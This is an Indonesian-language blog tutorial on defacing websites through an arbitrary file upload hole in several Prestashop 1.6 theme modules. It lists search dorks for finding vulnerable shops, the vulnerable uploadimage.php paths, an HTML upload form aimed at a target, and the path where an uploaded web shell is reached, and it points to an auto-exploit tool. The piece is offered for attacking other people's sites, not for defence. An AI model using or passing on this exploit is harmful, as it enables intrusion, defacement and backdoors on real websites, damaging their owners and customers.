Cara Deface Website dengan Responsive Prestashop 1.6 Arbitrary File Upload

Cara Deface Website dengan Responsive Prestashop 1.6 Arbitrary File Upload


Pada artikel yang satu ini , kami akan menjelaskan tentang " Cara deface website dengan Responsive Prestashop 1.6 Arbitrary File Upload " .
Disini menggunakan dua cara yaitu Manual dan Auto ( tools )

Berikut adalah langkah - langkah secara Manual :

#1 Dork :

- inurl:/modules/columnadverts/
- inurl:/modules/homepageadvertise/
- inurl:/modules/productpageadverts/
- inurl:/modules/simpleslideshow/
- inurl:/themes/warehouse/

untuk dork nya silahkan di kembangkan lagi.

#2  Jika Website yang anda pilih dari proses dorking tadi , apabila website tersebut memiliki celah / vuln maka akan muncul tampilan seperti ini :


#3 Apabila terdapat vuln , silahkan gunakan salah satu Exploit dan PoC di bawah ini :

- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php

Exploit Disini:
<form action="TARGET/modules/module name/uploadimage.php" enctype="multipart/form-data" method="POST">
<input name="userfile" type="file" /><button>Upload</button>
</form>


#4 Jika upload berhasil , akan muncul tampilan seperti ini :



#5 Selesai ...

Untuk mengakses Shell / backdoor yang telah di upload , silahkan gunakan yang di bawah ini :

     Target/modules/modul name/slides/shell.php


Jika anda masih bingung dengan cara manual seperti ini , anda bisa menggunakan Tools di "Auto Exploit Responsive Prestashop 1.6  Arbitrary File Upload " .

[YC]

 
function hideNow(e) { if (e.target.id == 'ac-wrapper') document.getElementById('ac-wrapper').style.display = 'none'; }